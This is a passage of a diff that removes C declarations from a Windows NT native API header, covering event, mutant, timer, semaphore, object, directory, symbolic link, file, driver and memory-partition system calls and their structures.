-NtCreateEvent(
- _Out_ PHANDLE EventHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ EVENT_TYPE EventType,
- _In_ BOOLEAN InitialState);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenEvent(
- _Out_ PHANDLE EventHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetEvent(
- _In_ HANDLE EventHandle,
- _Out_opt_ PLONG PreviousState);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtClearEvent(
- _In_ HANDLE EventHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtResetEvent(
- _In_ HANDLE EventHandle,
- _Out_opt_ PLONG PreviousState);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtPulseEvent(
- _In_ HANDLE EventHandle,
- _Out_opt_ PLONG PreviousState);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenKeyedEvent(
- _Out_ PHANDLE KeyedEventHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryEvent(
- _In_ HANDLE EventHandle,
- _In_ EVENT_INFORMATION_CLASS EventInformationClass,
- _Out_writes_bytes_(EventInformationLength) PVOID EventInformation,
- _In_ ULONG EventInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateEventPair(
- _Out_ PHANDLE EventPairHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenEventPair(
- _Out_ PHANDLE EventPairHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetLowEventPair(
- _In_ HANDLE EventPairHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetHighEventPair(
- _In_ HANDLE EventPairHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWaitLowEventPair(
- _In_ HANDLE EventPairHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWaitHighEventPair(
- _In_ HANDLE EventPairHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetLowWaitHighEventPair(
- _In_ HANDLE EventPairHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetHighWaitLowEventPair(
- _In_ HANDLE EventPairHandle);
-
-/************************************************************************************
-*
-* Mutant API.
-*
-************************************************************************************/
-
-typedef enum _MUTANT_INFORMATION_CLASS {
- MutantBasicInformation,
- MutantOwnerInformation
-} MUTANT_INFORMATION_CLASS;
-
-typedef struct _MUTANT_BASIC_INFORMATION {
- LONG CurrentCount;
- BOOLEAN OwnedByCaller;
- BOOLEAN AbandonedState;
-} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION;
-
-typedef struct _MUTANT_OWNER_INFORMATION {
- CLIENT_ID ClientId;
-} MUTANT_OWNER_INFORMATION, *PMUTANT_OWNER_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateMutant(
- _Out_ PHANDLE MutantHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ BOOLEAN InitialOwner);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenMutant(
- _Out_ PHANDLE MutantHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryMutant(
- _In_ HANDLE MutantHandle,
- _In_ MUTANT_INFORMATION_CLASS MutantInformationClass,
- _Out_writes_bytes_(MutantInformationLength) PVOID MutantInformation,
- _In_ ULONG MutantInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReleaseMutant(
- _In_ HANDLE MutantHandle,
- _Out_opt_ PLONG PreviousCount);
-
-/************************************************************************************
-*
-* Timer API.
-*
-************************************************************************************/
-
-typedef VOID(*PTIMER_APC_ROUTINE) (
- _In_ PVOID TimerContext,
- _In_ ULONG TimerLowValue,
- _In_ LONG TimerHighValue
- );
-
-typedef enum _TIMER_TYPE {
- NotificationTimer,
- SynchronizationTimer
-} TIMER_TYPE;
-
-typedef enum _TIMER_INFORMATION_CLASS {
- TimerBasicInformation
-} TIMER_INFORMATION_CLASS;
-
-typedef struct _TIMER_BASIC_INFORMATION {
- LARGE_INTEGER RemainingTime;
- BOOLEAN TimerState;
-} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION;
-
-typedef enum _TIMER_SET_INFORMATION_CLASS {
- TimerSetCoalescableTimer,
- MaxTimerInfoClass
-} TIMER_SET_INFORMATION_CLASS;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateTimer(
- _In_ PHANDLE TimerHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ TIMER_TYPE TimerType);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetTimer(
- _In_ HANDLE TimerHandle,
- _In_ PLARGE_INTEGER DueTime,
- _In_opt_ PTIMER_APC_ROUTINE TimerApcRoutine,
- _In_opt_ PVOID TimerContext,
- _In_ BOOLEAN WakeTimer,
- _In_opt_ LONG Period,
- _Out_opt_ PBOOLEAN PreviousState);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetTimerEx(
- _In_ HANDLE TimerHandle,
- _In_ TIMER_SET_INFORMATION_CLASS TimerSetInformationClass,
- _Inout_updates_bytes_opt_(TimerSetInformationLength) PVOID TimerSetInformation,
- _In_ ULONG TimerSetInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenTimer(
- _In_ PHANDLE TimerHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryTimer(
- _In_ HANDLE TimerHandle,
- _In_ TIMER_INFORMATION_CLASS TimerInformationClass,
- _Out_writes_bytes_(TimerInformationLength) PVOID TimerInformation,
- _In_ ULONG TimerInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCancelTimer(
- _In_ HANDLE TimerHandle,
- _Out_opt_ PBOOLEAN CurrentState);
-
-//ref from ph2
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateIRTimer(
- _Out_ PHANDLE TimerHandle,
- _In_ ACCESS_MASK DesiredAccess);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetIRTimer(
- _In_ HANDLE TimerHandle,
- _In_opt_ PLARGE_INTEGER DueTime);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateTimer2(
- _Out_ PHANDLE TimerHandle,
- _In_opt_ PVOID Reserved1,
- _In_opt_ PVOID Reserved2,
- _In_ ULONG Attributes,
- _In_ ACCESS_MASK DesiredAccess);
-
-/************************************************************************************
-*
-* Semaphore API.
-*
-************************************************************************************/
-
-typedef enum _SEMAPHORE_INFORMATION_CLASS {
- SemaphoreBasicInformation
-} SEMAPHORE_INFORMATION_CLASS;
-
-typedef struct _SEMAPHORE_BASIC_INFORMATION {
- LONG CurrentCount;
- LONG MaximumCount;
-} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateSemaphore(
- _Out_ PHANDLE SemaphoreHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ LONG InitialCount,
- _In_ LONG MaximumCount);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenSemaphore(
- _Out_ PHANDLE SemaphoreHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQuerySemaphore(
- _In_ HANDLE SemaphoreHandle,
- _In_ SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,
- _Out_writes_bytes_(SemaphoreInformationLength) PVOID SemaphoreInformation,
- _In_ ULONG SemaphoreInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReleaseSemaphore(
- _In_ HANDLE SemaphoreHandle,
- _In_ LONG ReleaseCount,
- _Out_opt_ PLONG PreviousCount);
-
-/************************************************************************************
-*
-* Object and Handle API.
-*
-************************************************************************************/
-typedef enum _OBJECT_INFORMATION_CLASS {
- ObjectBasicInformation,
- ObjectNameInformation,
- ObjectTypeInformation,
- ObjectTypesInformation,
- ObjectHandleFlagInformation,
- ObjectSessionInformation,
- ObjectSessionObjectInformation,
- MaxObjectInfoClass
-} OBJECT_INFORMATION_CLASS;
-
-typedef struct _OBJECT_DIRECTORY_INFORMATION {
- UNICODE_STRING Name;
- UNICODE_STRING TypeName;
-} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;
-
-typedef struct _OBJECT_BASIC_INFORMATION {
- ULONG Attributes;
- ACCESS_MASK GrantedAccess;
- ULONG HandleCount;
- ULONG PointerCount;
- ULONG PagedPoolCharge;
- ULONG NonPagedPoolCharge;
- ULONG Reserved[3];
- ULONG NameInfoSize;
- ULONG TypeInfoSize;
- ULONG SecurityDescriptorSize;
- LARGE_INTEGER CreationTime;
-} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;
-
-typedef struct _OBJECT_NAME_INFORMATION {
- UNICODE_STRING Name;
-} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;
-
-typedef struct _OBJECT_TYPE_INFORMATION {
- UNICODE_STRING TypeName;
- ULONG TotalNumberOfObjects;
- ULONG TotalNumberOfHandles;
- ULONG TotalPagedPoolUsage;
- ULONG TotalNonPagedPoolUsage;
- ULONG TotalNamePoolUsage;
- ULONG TotalHandleTableUsage;
- ULONG HighWaterNumberOfObjects;
- ULONG HighWaterNumberOfHandles;
- ULONG HighWaterPagedPoolUsage;
- ULONG HighWaterNonPagedPoolUsage;
- ULONG HighWaterNamePoolUsage;
- ULONG HighWaterHandleTableUsage;
- ULONG InvalidAttributes;
- GENERIC_MAPPING GenericMapping;
- ULONG ValidAccessMask;
- BOOLEAN SecurityRequired;
- BOOLEAN MaintainHandleCount;
- ULONG PoolType;
- ULONG DefaultPagedPoolCharge;
- ULONG DefaultNonPagedPoolCharge;
-} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;
-
-typedef struct _OBJECT_TYPE_INFORMATION_V2 {
- UNICODE_STRING TypeName;
- ULONG TotalNumberOfObjects;
- ULONG TotalNumberOfHandles;
- ULONG TotalPagedPoolUsage;
- ULONG TotalNonPagedPoolUsage;
- ULONG TotalNamePoolUsage;
- ULONG TotalHandleTableUsage;
- ULONG HighWaterNumberOfObjects;
- ULONG HighWaterNumberOfHandles;
- ULONG HighWaterPagedPoolUsage;
- ULONG HighWaterNonPagedPoolUsage;
- ULONG HighWaterNamePoolUsage;
- ULONG HighWaterHandleTableUsage;
- ULONG InvalidAttributes;
- GENERIC_MAPPING GenericMapping;
- ULONG ValidAccessMask;
- BOOLEAN SecurityRequired;
- BOOLEAN MaintainHandleCount;
- UCHAR TypeIndex;
- CHAR ReservedByte;
- ULONG PoolType;
- ULONG DefaultPagedPoolCharge;
- ULONG DefaultNonPagedPoolCharge;
-} OBJECT_TYPE_INFORMATION_V2, *POBJECT_TYPE_INFORMATION_V2;
-
-typedef struct _OBJECT_TYPES_INFORMATION {
- ULONG NumberOfTypes;
-} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION;
-
-#define OBJECT_TYPES_FIRST_ENTRY(ObjectTypes) (POBJECT_TYPE_INFORMATION)\
- RtlOffsetToPointer(ObjectTypes, ALIGN_UP(sizeof(OBJECT_TYPES_INFORMATION), ULONG_PTR))
-
-#define OBJECT_TYPES_NEXT_ENTRY(ObjectType) (POBJECT_TYPE_INFORMATION)\
- RtlOffsetToPointer(ObjectType, sizeof(OBJECT_TYPE_INFORMATION) + \
- ALIGN_UP(ObjectType->TypeName.MaximumLength, ULONG_PTR))
-
-typedef struct _OBJECT_HANDLE_FLAG_INFORMATION {
- BOOLEAN Inherit;
- BOOLEAN ProtectFromClose;
-} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtClose(
- _In_ HANDLE Handle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtDuplicateObject(
- _In_ HANDLE SourceProcessHandle,
- _In_ HANDLE SourceHandle,
- _In_opt_ HANDLE TargetProcessHandle,
- _Out_ PHANDLE TargetHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ ULONG HandleAttributes,
- _In_ ULONG Options);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtMakePermanentObject(
- _In_ HANDLE Handle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtMakeTemporaryObject(
- _In_ HANDLE Handle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetSecurityObject(
- _In_ HANDLE Handle,
- _In_ SECURITY_INFORMATION SecurityInformation,
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQuerySecurityObject(
- _In_ HANDLE Handle,
- _In_ SECURITY_INFORMATION SecurityInformation,
- _Out_writes_bytes_opt_(Length) PSECURITY_DESCRIPTOR SecurityDescriptor,
- _In_ ULONG Length,
- _Out_ PULONG LengthNeeded);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCompareObjects(
- _In_ HANDLE FirstObjectHandle,
- _In_ HANDLE SecondObjectHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryObject(
- _In_opt_ HANDLE Handle,
- _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
- _Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation,
- _In_ ULONG ObjectInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetInformationObject(
- _In_ HANDLE Handle,
- _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
- _In_reads_bytes_(ObjectInformationLength) PVOID ObjectInformation,
- _In_ ULONG ObjectInformationLength);
-
-typedef enum _WAIT_TYPE {
- WaitAll,
- WaitAny,
- WaitNotification
-} WAIT_TYPE;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWaitForSingleObject(
- _In_ HANDLE Handle,
- _In_ BOOLEAN Alertable,
- _In_opt_ PLARGE_INTEGER Timeout);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWaitForMultipleObjects(
- _In_ ULONG Count,
- _In_reads_(Count) HANDLE Handles[],
- _In_ WAIT_TYPE WaitType,
- _In_ BOOLEAN Alertable,
- _In_opt_ PLARGE_INTEGER Timeout);
-
-/************************************************************************************
-*
-* Directory Object API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateDirectoryObject(
- _Out_ PHANDLE DirectoryHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateDirectoryObjectEx(
- _Out_ PHANDLE DirectoryHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ HANDLE ShadowDirectoryHandle,
- _In_ ULONG Flags);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenDirectoryObject(
- _Out_ PHANDLE DirectoryHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryDirectoryObject(
- _In_ HANDLE DirectoryHandle,
- _Out_writes_bytes_opt_(Length) PVOID Buffer,
- _In_ ULONG Length,
- _In_ BOOLEAN ReturnSingleEntry,
- _In_ BOOLEAN RestartScan,
- _Inout_ PULONG Context,
- _Out_opt_ PULONG ReturnLength);
-
-/************************************************************************************
-*
-* Private Namespace API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreatePrivateNamespace(
- _Out_ PHANDLE NamespaceHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ PVOID BoundaryDescriptor);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenPrivateNamespace(
- _Out_ PHANDLE NamespaceHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ PVOID BoundaryDescriptor);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtDeletePrivateNamespace(
- _In_ HANDLE NamespaceHandle);
-
-/************************************************************************************
-*
-* Symbolic Link API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateSymbolicLinkObject(
- _Out_ PHANDLE LinkHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ PUNICODE_STRING LinkTarget);
-
-NTSYSAPI
-NTSTATUS
-WINAPI
-NtOpenSymbolicLinkObject(
- _Out_ PHANDLE LinkHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQuerySymbolicLinkObject(
- _In_ HANDLE LinkHandle,
- _Inout_ PUNICODE_STRING LinkTarget,
- _Out_opt_ PULONG ReturnedLength);
-
-/************************************************************************************
-*
-* File API (+Driver&HotPatch).
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateFile(
- _Out_ PHANDLE FileHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_opt_ PLARGE_INTEGER AllocationSize,
- _In_ ULONG FileAttributes,
- _In_ ULONG ShareAccess,
- _In_ ULONG CreateDisposition,
- _In_ ULONG CreateOptions,
- _In_reads_bytes_opt_(EaLength) PVOID EaBuffer,
- _In_ ULONG EaLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateNamedPipeFile(
- _Out_ PHANDLE FileHandle,
- _In_ ULONG DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG ShareAccess,
- _In_ ULONG CreateDisposition,
- _In_ ULONG CreateOptions,
- _In_ ULONG NamedPipeType,
- _In_ ULONG ReadMode,
- _In_ ULONG CompletionMode,
- _In_ ULONG MaximumInstances,
- _In_ ULONG InboundQuota,
- _In_ ULONG OutboundQuota,
- _In_opt_ PLARGE_INTEGER DefaultTimeout);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateMailslotFile(
- _Out_ PHANDLE FileHandle,
- _In_ ULONG DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG CreateOptions,
- _In_ ULONG MailslotQuota,
- _In_ ULONG MaximumMessageSize,
- _In_ PLARGE_INTEGER ReadTimeout);
-
-NTSYSCALLAPI
-NTSTATUS
-NTAPI
-NtDeviceIoControlFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG IoControlCode,
- _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
- _In_ ULONG OutputBufferLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtFsControlFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG FsControlCode,
- _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
- _In_ ULONG OutputBufferLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenFile(
- _Out_ PHANDLE FileHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG ShareAccess,
- _In_ ULONG OpenOptions);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReadFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID Buffer,
- _In_ ULONG Length,
- _In_opt_ PLARGE_INTEGER ByteOffset,
- _In_opt_ PULONG Key);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWriteFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_reads_bytes_(Length) PVOID Buffer,
- _In_ ULONG Length,
- _In_opt_ PLARGE_INTEGER ByteOffset,
- _In_opt_ PULONG Key);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtLockFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ PLARGE_INTEGER ByteOffset,
- _In_ PLARGE_INTEGER Length,
- _In_ ULONG Key,
- _In_ BOOLEAN FailImmediately,
- _In_ BOOLEAN ExclusiveLock);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtUnlockFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ PLARGE_INTEGER ByteOffset,
- _In_ PLARGE_INTEGER Length,
- _In_ ULONG Key);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtFlushBuffersFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetInformationFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ PVOID FileInformation,
- _In_ ULONG Length,
- _In_ FILE_INFORMATION_CLASS FileInformationClass);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtDeleteFile(
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryInformationFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID FileInformation,
- _In_ ULONG Length,
- _In_ FILE_INFORMATION_CLASS FileInformationClass);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryFullAttributesFile(
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Out_ PFILE_NETWORK_OPEN_INFORMATION FileInformation);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryDirectoryFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID FileInformation,
- _In_ ULONG Length,
- _In_ FILE_INFORMATION_CLASS FileInformationClass,
- _In_ BOOLEAN ReturnSingleEntry,
- _In_opt_ PUNICODE_STRING FileName,
- _In_ BOOLEAN RestartScan);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryEaFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID Buffer,
- _In_ ULONG Length,
- _In_ BOOLEAN ReturnSingleEntry,
- _In_reads_bytes_opt_(EaListLength) PVOID EaList,
- _In_ ULONG EaListLength,
- _In_opt_ PULONG EaIndex,
- _In_ BOOLEAN RestartScan);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetEaFile( - _In_ HANDLE FileHandle, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _In_bytecount_(Length) PVOID Buffer, - _In_ ULONG Length); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryVolumeInformationFile( - _In_ HANDLE FileHandle, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _Out_writes_bytes_(Length) PVOID FsInformation, - _In_ ULONG Length, - _In_ FS_INFORMATION_CLASS FsInformationClass); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryQuotaInformationFile( - _In_ HANDLE FileHandle, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _Out_writes_bytes_(Length) PVOID Buffer, - _In_ ULONG Length, - _In_ BOOLEAN ReturnSingleEntry, - _In_reads_bytes_opt_(SidListLength) PVOID SidList, - _In_ ULONG SidListLength, - _In_opt_ PSID StartSid, - _In_ BOOLEAN RestartScan); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetQuotaInformationFile( - _In_ HANDLE FileHandle, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _In_reads_bytes_(Length) PVOID Buffer, - _In_ ULONG Length); - -NTSYSAPI -NTSTATUS -NTAPI -NtReadFileScatter( - _In_ HANDLE FileHandle, - _In_opt_ HANDLE Event, - _In_opt_ PIO_APC_ROUTINE ApcRoutine, - _In_opt_ PVOID ApcContext, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _In_ PFILE_SEGMENT_ELEMENT SegmentArray, - _In_ ULONG Length, - _In_opt_ PLARGE_INTEGER ByteOffset, - _In_opt_ PULONG Key); - -NTSYSAPI -NTSTATUS -NTAPI -NtWriteFileGather( - _In_ HANDLE FileHandle, - _In_opt_ HANDLE Event, - _In_opt_ PIO_APC_ROUTINE ApcRoutine, - _In_opt_ PVOID ApcContext, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _In_ PFILE_SEGMENT_ELEMENT SegmentArray, - _In_ ULONG Length, - _In_opt_ PLARGE_INTEGER ByteOffset, - _In_opt_ PULONG Key); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryDirectoryFile( - _In_ HANDLE FileHandle, - _In_opt_ HANDLE Event, - _In_opt_ PIO_APC_ROUTINE ApcRoutine, - _In_opt_ PVOID ApcContext, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _Out_writes_bytes_(Length) PVOID FileInformation, - _In_ ULONG Length, - _In_ FILE_INFORMATION_CLASS FileInformationClass, - _In_ BOOLEAN ReturnSingleEntry, - _In_opt_ PUNICODE_STRING 
FileName, - _In_ BOOLEAN RestartScan); - -NTSYSAPI -NTSTATUS -NTAPI -NtNotifyChangeDirectoryFile( - _In_ HANDLE FileHandle, - _In_opt_ HANDLE Event, - _In_opt_ PIO_APC_ROUTINE ApcRoutine, - _In_opt_ PVOID ApcContext, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _Out_writes_bytes_(Length) PVOID Buffer, - _In_ ULONG Length, - _In_ ULONG CompletionFilter, - _In_ BOOLEAN WatchTree); - -NTSYSAPI -NTSTATUS -NTAPI -NtLoadDriver( - _In_ PUNICODE_STRING DriverServiceName); - -NTSYSAPI -NTSTATUS -NTAPI NtUnloadDriver( - _In_ PUNICODE_STRING DriverServiceName); - -NTSYSAPI -NTSTATUS -NTAPI -NtLoadHotPatch( - _In_ PUNICODE_STRING HotPatchName, - _Reserved_ ULONG LoadFlag); - -/************************************************************************************ -* -* Section API (+MemoryPartitions). -* -************************************************************************************/ - -typedef enum _MEMORY_PARTITION_INFORMATION_CLASS { - SystemMemoryPartitionInformation, - SystemMemoryPartitionMoveMemory, - SystemMemoryPartitionAddPagefile, - SystemMemoryPartitionCombineMemory, - SystemMemoryPartitionInitialAddMemory, - SystemMemoryPartitionGetMemoryEvents, - SystemMemoryPartitionMax -} MEMORY_PARTITION_INFORMATION_CLASS; - -typedef struct _MEMORY_PARTITION_PAGE_RANGE { - ULONG_PTR StartPage; - ULONG_PTR NumberOfPages; -} MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE; - -typedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION { - ULONG Flags; - ULONG NumberOfRanges; - ULONG_PTR NumberOfPagesAdded; - 